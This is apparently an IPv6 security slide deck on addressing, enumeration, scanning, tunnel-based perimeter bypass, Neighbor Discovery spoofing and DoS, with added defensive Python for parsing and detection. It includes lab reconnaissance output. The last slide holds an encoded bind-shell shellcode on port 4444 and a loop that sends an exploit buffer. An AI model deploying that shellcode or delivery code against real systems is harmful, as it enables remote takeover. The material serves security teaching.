IPv6 Fundamentals & Securities
  1. IPv6 Fundamentals & Securities
     Don Anto, IPSECS.COM
  2. Who?
     • Don Anto
     • Information security manager
     • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
     • A dead security researcher
     • Involved in the security field for almost 10 years
     • Genius evil thinker; professional troublemaker
     • @djantoxz
  3. IPv6 - Why?
     • Analog-to-digital convergence (e.g. Voice over IP)
     • The use of virtualization (e.g. cloud)
     • Networking of embedded devices (smartphones, RFID)
     • All of these increase the need for unique IP addresses
     • So, more IP address space is required!
     • Finally, IPv4 address exhaustion
  4. IPv6 - What?
     • The latest version of the Internet Protocol (IP), intended to replace IPv4
     • 128-bit addressing instead of 32-bit, to multiply the address space
     • IPv4 = 2^32 (4,294,967,296) vs. IPv6 = 2^128 (about 3.4×10^38)
     • Dotted-decimal notation is no longer used; instead, hexadecimal groups separated by colons
     • E.g.:
       • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
       • 2001:470:0:64::2
       • fe80::1
  5. IPv6 Fundamentals (Source: Fernando Gont presentation)
     • IPv6 header: 40 bytes, fixed length
     • Source address 16 bytes, destination address 16 bytes
     • 8 bytes for version, traffic class, flow label, payload length, next header & hop limit
  6. IPv6 Fundamentals (Source: Fernando Gont presentation)
     • IPv6 address types:
       • Loopback
       • Unspecified
       • Multicast
       • Anycast
       • Local unicast
       • Global unicast
     • Subnetting
     • Routing
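Slides 5 and 6 describe the fixed 40-byte header and the address types but give no worked decoding. The following is an added example, not code from the deck or from Fernando Gont's material: it unpacks the header fields named on slide 5 and then names an address's type by prefix rule, using the sample addresses from slide 4 and the lab prefix dead:beaf:: from the later slides. The header builder exists only to construct a sample packet for the parser; anycast cannot be told apart from unicast by syntax, so it is not a separate class here.

```python
import struct
from ipaddress import IPv6Address

# Fixed 40-byte IPv6 header (RFC 8200):
#   4-bit version | 8-bit traffic class | 20-bit flow label
#   16-bit payload length | 8-bit next header | 8-bit hop limit
#   128-bit source address | 128-bit destination address
IPV6_HEADER_LEN = 40


def parse_ipv6_header(data: bytes) -> dict:
    """Decode the fixed header; raise ValueError if this is not a sane IPv6 header."""
    if len(data) < IPV6_HEADER_LEN:
        raise ValueError("short packet: need 40 bytes of header")
    first_word, payload_len, next_header, hop_limit = struct.unpack("!IHBB", data[:8])
    version = first_word >> 28
    if version != 6:
        raise ValueError(f"not IPv6 (version field = {version})")
    return {
        "version": version,
        "traffic_class": (first_word >> 20) & 0xFF,
        "flow_label": first_word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_header,      # 58 = ICMPv6, 6 = TCP, 17 = UDP, ...
        "hop_limit": hop_limit,
        "src": IPv6Address(data[8:24]),
        "dst": IPv6Address(data[24:40]),
    }


def classify(addr: IPv6Address) -> str:
    """Name the address type (as listed on slide 6) from its leading bits."""
    packed = addr.packed
    if addr == IPv6Address("::"):
        return "unspecified"
    if addr == IPv6Address("::1"):
        return "loopback"
    if packed[0] == 0xFF:                                   # ff00::/8
        return "multicast"
    if packed[0] == 0xFE and (packed[1] & 0xC0) == 0x80:    # fe80::/10
        return "link-local unicast"
    if (packed[0] & 0xFE) == 0xFC:                          # fc00::/7
        return "unique local unicast"
    if (packed[0] & 0xE0) == 0x20:                          # 2000::/3
        return "global unicast"
    return "reserved/other"


def build_ipv6_header(src, dst, payload_len, next_header=58, hop_limit=64, tclass=0, flow=0):
    """Constructed sample header (not a captured packet), used only to exercise the parser."""
    first_word = (6 << 28) | (tclass << 20) | flow
    return (struct.pack("!IHBB", first_word, payload_len, next_header, hop_limit)
            + IPv6Address(src).packed + IPv6Address(dst).packed)


if __name__ == "__main__":
    # A link-local node sending an ICMPv6 message to the all-nodes multicast group.
    hdr = build_ipv6_header("fe80::a00:27ff:fe39:6f0a", "ff02::1", 64, next_header=58, hop_limit=255)
    fields = parse_ipv6_header(hdr)
    for k, v in fields.items():
        print(f"{k:15} {v}")
    for a in ("2001:470:0:64::2", "fe80::1", "dead:beaf::3", "::1"):
        print(f"{a:30} {classify(IPv6Address(a))}")
```

Note that the lab prefix dead:beaf:: used on the enumeration slides falls outside 2000::/3 and so is not a valid global unicast allocation; the classifier reports it as reserved, which is the right answer for a perimeter filter that only expects 2000::/3 traffic from the Internet.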
  7. v4 vs. v6 (Source: Fernando Gont presentation)
  8. v4 to v6
     • Dual-stack systems support IPv4 & IPv6 concurrently
     • Tunneling mechanisms encapsulate IPv6 inside IPv4
       • 6to4, 6in4, Teredo, ISATAP
     • Network Address Translation (NAT)
       • Network Address Translation - Protocol Translation (NAT-PT)
       • Network Address Translation IPv6-IPv4 (NAT-64)
     • Free IPv6 tunnel broker?
  9. Security Issues
     • Large IPv6 address space (enumeration, scanning, managing)
     • The use of tunneling? The use of dual-stack networking?
     • Weaknesses in IPv6 itself? (protocol-level vulnerabilities)
     • Weaknesses of applications running on IPv6
  10. Enumeration
     • Discovery through the all-nodes multicast address (FF02::1)
     • Discovery through ICMPv6 Echo Request
     • Discovery through DNS queries (A vs. AAAA)
     • Discovery through SNMP queries
     • Google helps us to find IPv6 domains
     • The presence of an IPAM may help

     ipv6lab->./alive6 eth4
     Alive: dead:beaf::3
     Alive: dead:beaf::1
     Found 2 systems alive

     ipv6lab->host -t A
     has address
     ipv6lab->host -t AAAA
     has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

     ipv6lab->ping6 -I eth4 ff02::1
     PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
     64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
     64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
     64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)

     ipv6lab->ip -6 neigh show
     fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
     fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
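The ping6 replies and the neighbour table above line up because every lab host formed its link-local address from its MAC by modified EUI-64 (RFC 4291): fe80::a00:27ff:fe96:da90 is 08:00:27:96:da:90 with the universal/local bit flipped and ff:fe inserted. That is what makes "large address space" a weaker defence than it sounds, since EUI-64 identifiers shrink the search to one vendor OUI plus 24 bits. The code below is an added example, not the deck's, showing the derivation in both directions and using it to cross-check an `ip -6 neigh show` listing (the two lines from the slide, reproduced as sample input); an address whose embedded MAC does not match the learnt lladdr is either a privacy/temporary address (RFC 4941, the usual mitigation) or worth a second look.

```python
from ipaddress import IPv6Address
from typing import Optional


def mac_to_eui64_linklocal(mac: str) -> IPv6Address:
    """Modified EUI-64 link-local address (fe80::/64) for a 48-bit MAC."""
    octets = bytes(int(x, 16) for x in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC like 08:00:27:96:da:90")
    # Flip the universal/local bit (bit 1 of the first octet) and insert ff:fe in the middle.
    iid = bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:6]
    return IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid)


def embedded_mac(addr) -> Optional[str]:
    """MAC encoded in an EUI-64-style interface identifier, or None if the IID is not EUI-64."""
    iid = IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    octets = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join(f"{b:02x}" for b in octets)


# Constructed sample input: the two neighbour-table lines shown on the slide.
NEIGH_SAMPLE = """\
fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
"""


def inventory_from_neighbors(lines):
    """Parse `ip -6 neigh show` output and flag whether each IID agrees with the learnt lladdr."""
    entries = []
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        addr = parts[0]
        lladdr = parts[parts.index("lladdr") + 1].lower() if "lladdr" in parts else None
        entries.append({
            "addr": addr,
            "lladdr": lladdr,
            "state": parts[-1],
            "embedded_mac": embedded_mac(addr),
            # False for privacy/temporary addresses, and for an address claimed by a foreign MAC.
            "iid_matches_lladdr": lladdr is not None and embedded_mac(addr) == lladdr,
        })
    return entries


if __name__ == "__main__":
    print(mac_to_eui64_linklocal("08:00:27:96:da:90"))
    for e in inventory_from_neighbors(NEIGH_SAMPLE.splitlines()):
        print(e)
```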
  11. Scanning
     • Port scanning (tools with IPv6 support)
     • Vulnerability scanning (tools with IPv6 support)
     • A v4-to-v6 proxy is usually helpful, e.g. socat (apt-get install socat)

     ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3
     Starting Nmap 5.00 ( ) at 2013-01-15 15:50 WIT
     Interesting ports on dead:beaf::3:
     Not shown: 999 closed ports
     PORT   STATE SERVICE VERSION
     22/tcp open  ssh     OpenSSH 5.9 (protocol 2.0)

     ipv6lab->nmap -sV -PN -T4
     Starting Nmap 5.00 ( ) at 2013-01-15 15:50 WIT
     Interesting ports on
     Not shown: 998 closed ports
     PORT   STATE SERVICE VERSION
     21/tcp open  ftp?
     22/tcp open  ssh     OpenSSH 5.9 (protocol 2.0)
     MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)
  12. Perimeter Defense Bypass
     • Does the firewall protect both the IPv4 and the IPv6 network?
     • Does the IDS/IPS protect both the IPv4 and the IPv6 network?
     • Teredo tunneling can be used to bypass NAT and to compromise the internal network
     • The use of dual stack and tunneling mandates protection for both IPv4 and IPv6
  13. Perimeter Defense Bypass
     • IPv4 is well governed by the firewall using NAT or policies
     • A poorly configured firewall can potentially be bypassed by reaching the DMZ over the IPv6 network
     • Even worse, someone may directly access the internal network from the Internet
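Slides 12 and 13 ask whether the IPv4-only perimeter also sees the IPv6 that rides over it. The tunnels from slide 8 are visible in the IPv4 layer if you look: 6in4, 6to4 and ISATAP carry IPv6 directly as IPv4 protocol 41, and Teredo carries it inside UDP with the server port 3544 on one side. The following is an added example, not the deck's code: it builds three constructed IPv4 packets (a 6to4 packet towards the old 6to4 relay anycast address 192.88.99.1, a Teredo packet, and an ordinary TCP packet) and classifies each, which is the kind of check an IPv4-only IDS rule or firewall audit needs so that tunnelled IPv6 is either blocked or inspected. The Teredo match is a heuristic (client-to-client traffic uses other ports), so treat it as a detection aid rather than a complete filter.

```python
import struct
from ipaddress import IPv4Address

PROTO_IPV6_IN_IPV4 = 41   # 6in4 / 6to4 / ISATAP: IPv6 packet is the IPv4 payload
PROTO_UDP = 17
TEREDO_PORT = 3544        # Teredo server port; clients wrap IPv6 in UDP to cross NAT


def build_ipv4(src, dst, proto, payload):
    """Constructed IPv4 packet with a minimal 20-byte header (checksum left as 0)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      IPv4Address(src).packed, IPv4Address(dst).packed)
    return hdr + payload


def _looks_like_ipv6(payload: bytes) -> bool:
    return bool(payload) and payload[0] >> 4 == 6


def classify_tunnel(pkt: bytes):
    """Describe any IPv6-over-IPv4 tunnel this IPv4 packet carries, or None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    src, dst = IPv4Address(pkt[12:16]), IPv4Address(pkt[16:20])
    if proto == PROTO_IPV6_IN_IPV4:
        if _looks_like_ipv6(pkt[ihl:]):
            return f"6in4/6to4 tunnel {src}->{dst}"
        return f"protocol 41 without IPv6 payload {src}->{dst}"
    if proto == PROTO_UDP and len(pkt) >= ihl + 8:
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
        if TEREDO_PORT in (sport, dport):
            inner = pkt[ihl + 8:]
            # Teredo may prepend an Origin (00 00) or Authentication (00 01) indication
            # before the IPv6 packet, so accept those markers as well.
            if _looks_like_ipv6(inner) or inner[:2] in (b"\x00\x00", b"\x00\x01"):
                return f"Teredo tunnel {src}:{sport}->{dst}:{dport}"
    return None


def audit(packets):
    """Labels for every packet that carries tunnelled IPv6."""
    return [label for label in map(classify_tunnel, packets) if label]


def sample_packets():
    """Constructed samples (documentation addresses, not captured traffic)."""
    v6 = bytes([0x60]) + b"\x00" * 39          # bare IPv6 header stub: version 6, rest zero
    udp = struct.pack("!HHHH", 40000, TEREDO_PORT, 8 + len(v6), 0) + v6
    return {
        "6to4": build_ipv4("192.0.2.10", "192.88.99.1", PROTO_IPV6_IN_IPV4, v6),
        "teredo": build_ipv4("192.0.2.10", "198.51.100.5", PROTO_UDP, udp),
        "plain_tcp": build_ipv4("192.0.2.10", "198.51.100.5", 6, b"\x00" * 20),
    }


if __name__ == "__main__":
    for name, pkt in sample_packets().items():
        print(f"{name:10} {classify_tunnel(pkt)}")
```

On a perimeter that has no IPv6 policy at all, the defensible default is to drop protocol 41 and UDP/3544 at the IPv4 edge until the IPv6 side gets the same firewall and IDS coverage as IPv4.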
  14. Exploiting - Protocols
     • IPv6 was also designed to improve on the security of IPv4; unfortunately there is no significant improvement
     • Some problems of IPv4 still persist in IPv6
     • Man-in-the-middle attacks
     • Denial-of-service attacks
     • More and more
  15. Man In The Middle
     • Spoofed ICMPv6 Neighbor Advertisement (replacing ARP in v4)
     • Spoofed ICMPv6 Router Advertisement
     • Spoofed ICMPv6 Redirect or ICMPv6 Packet Too Big to implant routing
     • Rogue DHCPv6 server (replacing the DHCP server in v4)
     • More and more
     • Used to help packet sniffing
     (Source image: OWASP website)
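The ARP-watching idea carries over to Neighbor Discovery: a spoofed NA rebinds a victim's address to the attacker's MAC, and a spoofed RA installs a rogue default router or prefix. The code below is an added example, not the deck's, of a small watcher over already-decoded ICMPv6 NA/RA observations (the message dicts are a constructed, simplified representation, not a capture format): it remembers the first link-layer address seen for each NA target and alerts when it changes, and checks RAs against an assumed list of authorised router MACs and expected prefixes, also rejecting RAs whose source is not link-local since RFC 4861 requires that. The sample sequence reuses the lab hosts from the enumeration slides; in production the same logic sits behind RA Guard and ND inspection on the switch.

```python
from ipaddress import IPv6Address, IPv6Network


class NDWatch:
    """Baseline check for decoded ICMPv6 NA/RA observations (assumed, simplified message model)."""

    def __init__(self, router_lladdrs, prefixes):
        self.routers = {m.lower() for m in router_lladdrs}
        self.prefixes = [IPv6Network(p) for p in prefixes]
        self.bindings = {}   # NA target address -> link-layer address first learnt for it
        self.alerts = []

    def observe(self, msg):
        """Feed one decoded message; return the alert text, or None if it looks benign."""
        handler = {"NA": self._check_na, "RA": self._check_ra}.get(msg["type"])
        alert = handler(msg) if handler else None
        if alert:
            self.alerts.append(alert)
        return alert

    def _check_na(self, msg):
        target, lladdr = msg["target"], msg["lladdr"].lower()
        if IPv6Address(target).is_multicast:
            return f"NA claims multicast target {target} from {lladdr}"
        known = self.bindings.setdefault(target, lladdr)
        if known != lladdr:
            return f"NA changes {target}: {known} -> {lladdr} (possible spoofed NA)"
        return None

    def _check_ra(self, msg):
        reasons = []
        src = IPv6Address(msg["src"])
        if not src.is_link_local:
            reasons.append(f"source {src} is not link-local")
        if msg["lladdr"].lower() not in self.routers:
            reasons.append(f"router {msg['lladdr']} is not an authorised router")
        for p in msg.get("prefixes", []):
            if IPv6Network(p) not in self.prefixes:
                reasons.append(f"unexpected prefix {p}")
        if not reasons:
            return None
        return f"rogue RA from {src}: " + "; ".join(reasons)


# Constructed observation sequence: a legitimate NA and RA, then a spoofed NA and a rogue RA.
SAMPLE_MESSAGES = [
    {"type": "NA", "target": "dead:beaf::1", "lladdr": "08:00:27:96:da:90"},
    {"type": "RA", "src": "fe80::a00:27ff:fe96:da90", "lladdr": "08:00:27:96:da:90",
     "prefixes": ["dead:beaf::/64"]},
    {"type": "NA", "target": "dead:beaf::1", "lladdr": "08:00:27:6c:ea:37"},
    {"type": "RA", "src": "fe80::a00:27ff:fe6c:ea37", "lladdr": "08:00:27:6c:ea:37",
     "prefixes": ["2001:db8:bad::/64"]},
]


def run_sample():
    """Run the watcher over SAMPLE_MESSAGES and return the alerts it raised."""
    watch = NDWatch(router_lladdrs=["08:00:27:96:da:90"], prefixes=["dead:beaf::/64"])
    for msg in SAMPLE_MESSAGES:
        watch.observe(msg)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```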
  16. Denial of Services
     • Traffic flooding with ICMPv6 RA, NA, NS, MLD, smurfing
     • Preventing new IPv6 addresses with DAD
     • CPU exhaustion with ICMPv6 NS and a lot of crypto stuff
     • Routing loop attack utilizing automatic tunneling
     • ICMP attack against TCP to tear down a BGP session

     anto# ifstat -b eth0
            Kbps in   Kbps out
            9851.48       1.08
           10244.34       0.95
           10313.33       0.95
            9165.56       0.95
            9358.11       0.95
           10165.01       0.95
            9802.98       0.95
            9353.34       0.95

     anto# tcpdump -n -i eth0 dst host dead:beaf::3
     20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
     20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
     20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
     20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
     20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
     4700 packets captured
     4884 packets received by filter
     93 packets dropped by kernel
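Two things in the tcpdump output above give the flood away even without the bandwidth graph: the source address is ff02::1, and a multicast address can never be a legitimate source, so every one of these packets is forged; and thousands of identical echo requests arrive within the same second. The code below is an added example, not the deck's: it parses tcpdump ICMP6 lines (the five lines from the slide, plus a constructed burst of 200 lines in the next second that stands in for the rest of the 4700 captured) and reports forged-source packets and per-second flows above a threshold. The same two checks are what an ingress filter and an ICMPv6 rate limit implement on the wire.

```python
import re
from collections import Counter
from ipaddress import IPv6Address

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d)\.\d+ IP6 (?P<src>\S+) > (?P<dst>\S+): ICMP6, (?P<kind>[^,]+)"
)

# The five lines reproduced from the slide's tcpdump output.
SLIDE_LINES = [
    "20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
    "20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24",
]


def synthetic_burst(n, second="20:39:49"):
    """Constructed lines (not from the slide) mimicking n packets of the same flood in one second."""
    return [
        f"{second}.{i:06d} IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24"
        for i in range(n)
    ]


def parse(line):
    """Timestamp (to the second), src, dst and ICMP6 message kind, or None for non-ICMP6 lines."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, pps_threshold=100):
    """Count forged multicast-source packets and per-second flows above pps_threshold."""
    parsed = 0
    spoofed = 0
    per_second = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        parsed += 1
        if IPv6Address(rec["src"]).is_multicast:
            spoofed += 1          # multicast can only be a destination: the source is forged
        per_second[(rec["src"], rec["dst"], rec["kind"], rec["ts"])] += 1
    floods = sorted((flow, n) for flow, n in per_second.items() if n > pps_threshold)
    return {"parsed": parsed, "spoofed_multicast_source": spoofed, "floods": floods}


if __name__ == "__main__":
    report = analyze(SLIDE_LINES + synthetic_burst(200))
    print(report["parsed"], "ICMP6 lines,", report["spoofed_multicast_source"], "with a multicast source")
    for (src, dst, kind, sec), n in report["floods"]:
        print(f"flood: {src} -> {dst} {kind}: {n} packets in second {sec}")
```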
  17. Exploiting - Apps
     • Buffer overflow
     • Remote format string
     • Off-by-one
     • Web app attacks
     • More attacks?!
     • There's no big difference
     • Socket programming & shellcodes
     • A v4-to-v6 proxy is usually helpful, e.g. socat (apt-get install socat)

     char shellcode[] = /* Portbind @ 4444 */
     "\xd9\xcc\xbd\x59\x34\x55\x97\xd9\x74\x24\xf4\x5a\x29\xc9"
     "\xb1\x17\x31\x6a\x19\x83\xc2\x04\x03\x6a\x15\xbb\xc1\x64"
     "\x4c\x68\x69\xd4\x18\x84\xe4\x3b\xb6\xfe\xae\x76\xc7\x68"
     "\xd7\xdb\x9a\xc6\xba\x89\x48\x80\x52\x3f\x31\x2a\xcb\x35"
     "\xc9\x3b\xea\x20\xd5\x6a\xbb\x3d\x04\xcf\x29\x58\x9f\x02"
     "\x2d\x14\x79\x2f\x2a\x98\x06\x1d\x61\x74\x8e\x40\xc6\xc8"
     "\xf6\x4f\x49\xbb\xae\x25\x75\xe4\x9d\x39\xc0\x6d\xe6\x51"
     "\xfc\xa2\x65\xc9\x6a\x92\xeb\x60\x05\x65\x08\x22\x8a\xfc"
     "\x2e\x72\x27\x32\x30";

     /* The slide shows only this loop; the getaddrinfo() call that fills AddrInfo
        and the code that builds buffer/len are not on the slide. Because the
        address family comes from getaddrinfo(), the same loop connects over v4 or v6. */
     for (AI = AddrInfo; AI != NULL; AI = AI->ai_next) {
         if ((s = socket(AI->ai_family, AI->ai_socktype, AI->ai_protocol)) < 0) {
             printf("cant create socket\n");
             exit(0);
         }
         connect(s, AI->ai_addr, AI->ai_addrlen);
         send(s, buffer, len, 0);
         printf("Check your shell on %s TCP port 4444\n", argv[1]);
     }
